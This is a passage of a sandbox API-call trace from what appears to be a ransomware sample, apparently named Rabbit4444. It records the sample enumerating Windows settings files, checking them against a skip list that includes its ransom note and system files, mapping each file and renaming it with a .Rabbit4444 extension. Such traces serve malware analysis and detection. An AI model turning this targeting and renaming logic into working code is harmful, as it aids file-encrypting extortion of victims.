param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms.Rabbit4444") returned 192 [0059.331] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaca901f-e74f-4894-b074-f55059532853}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AACA901F-E74F-4894-B074-F55059532853}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaca901f-e74f-4894-b074-f55059532853}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.332] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54c49c8b, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54c49c8b, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x230eb5fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", cAlternateFileName="CLF3B5~1.SET")) returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2=".") returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="..") returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="windows") returned -1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="boot") returned 1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.332] lstrcmpiW (lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.332] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms" | out: lpString1="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms") returned="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms" [0059.333] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.333] lstrlenW (lpString="Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms") returned 64 [0059.333] lstrlenW (lpString="Rabbit4444") returned 10 [0059.333] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.333] lstrlenW (lpString=".dll") returned 4 [0059.333] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.333] lstrlenW (lpString=".lnk") returned 4 [0059.333] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.333] lstrlenW (lpString=".ini") returned 4 [0059.333] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.333] lstrlenW (lpString=".sys") returned 4 [0059.333] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.333] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaf384a9-978c-41b6-b394-0c40c2eaaa4b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.333] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.333] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15064424258) returned 1 [0059.334] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=964) returned 1 [0059.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0059.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1016b0 [0059.334] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6d0, lpName=0x0) returned 0x298 [0059.335] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6d0) returned 0x70000 [0059.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0059.336] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.336] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15064680581) returned 1 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0059.336] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1016b0 | out: hHeap=0xe0000) returned 1 [0059.336] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.336] CloseHandle (hObject=0x298) returned 1 [0059.336] CloseHandle (hObject=0x278) returned 1 [0059.336] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms.Rabbit4444") returned 192 [0059.336] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaf384a9-978c-41b6-b394-0c40c2eaaa4b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AAF384A9-978C-41B6-B394-0C40C2EAAA4B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{aaf384a9-978c-41b6-b394-0c40c2eaaa4b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.337] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54ce2625, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54ce2625, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224d97aa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x42a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", cAlternateFileName="CL387A~1.SET")) returned 1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2=".") returned 1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="..") returned 1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="windows") returned -1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.337] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="boot") returned 1 [0059.338] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.338] lstrcmpiW (lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.338] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms" | out: lpString1="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms") returned="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms" [0059.338] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.338] lstrlenW (lpString="Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms") returned 64 [0059.338] lstrlenW (lpString="Rabbit4444") returned 10 [0059.338] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.338] lstrlenW (lpString=".dll") returned 4 [0059.338] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.338] lstrlenW (lpString=".lnk") returned 4 [0059.338] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.338] lstrlenW (lpString=".ini") returned 4 [0059.338] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.338] lstrlenW (lpString=".sys") returned 4 [0059.338] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.338] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{af3ba0ec-b240-401e-b4ee-3e89f275205b}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.338] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.338] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15064925819) returned 1 [0059.339] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1066) returned 1 [0059.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0059.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0059.339] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x730, lpName=0x0) returned 0x298 [0059.340] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x730) returned 0x70000 [0059.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0059.341] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0059.341] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15065177229) returned 1 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0059.341] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0059.341] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.341] CloseHandle (hObject=0x298) returned 1 [0059.341] CloseHandle (hObject=0x278) returned 1 [0059.341] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms.Rabbit4444") returned 192 [0059.341] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{af3ba0ec-b240-401e-b4ee-3e89f275205b}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{AF3BA0EC-B240-401E-B4EE-3E89F275205B}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{af3ba0ec-b240-401e-b4ee-3e89f275205b}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.342] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54d7af81, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54d7af81, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2328efd5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3ad, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", cAlternateFileName="CLEAF4~1.SET")) returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2=".") returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="..") returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="windows") returned -1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="boot") returned 1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.342] lstrcmpiW (lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0059.343] lstrcpyW (in: lpString1=0x130ec22, lpString2="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms" | out: lpString1="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms") returned="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms" [0059.343] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0059.343] lstrlenW (lpString="Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms") returned 64 [0059.343] lstrlenW (lpString="Rabbit4444") returned 10 [0059.343] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0059.343] lstrlenW (lpString=".dll") returned 4 [0059.343] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0059.343] lstrlenW (lpString=".lnk") returned 4 [0059.343] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0059.343] lstrlenW (lpString=".ini") returned 4 [0059.343] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0059.343] lstrlenW (lpString=".sys") returned 4 [0059.343] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0059.343] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b0b4886c-4b31-4824-adcd-0daf5c8baff6}.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0059.344] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0059.344] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=15065436384) returned 1 [0059.344] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=941) returned 1 [0059.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0059.344] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0059.344] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6b0, lpName=0x0) returned 0x298 [0059.345] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6b0) returned 0x70000 [0059.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0059.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0059.346] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0059.346] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=15065708297) returned 1 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0059.346] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0059.346] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0059.347] CloseHandle (hObject=0x298) returned 1 [0059.347] CloseHandle (hObject=0x278) returned 1 [0059.347] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms.Rabbit4444") returned 192 [0059.347] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b0b4886c-4b31-4824-adcd-0daf5c8baff6}.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\Classic_{B0B4886C-4B31-4824-ADCD-0DAF5C8BAFF6}.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\classic_{b0b4886c-4b31-4824-adcd-0daf5c8baff6}.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0059.348] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54e138c7, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x54e138c7, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x224ffa05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x392, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", cAlternateFileName="CLF600~1.SET")) returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2=".") returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="..") returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="windows") returned -1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="bootmgr") returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="boot") returned 1 [0059.348] lstrcmpiW (lpString1="Classic_{B1207959-FFBF-4417-A6B1-4BF0EDA51F5A}.settingcontent-ms", lpString2="ids.txt") returned -1 [0059.348] 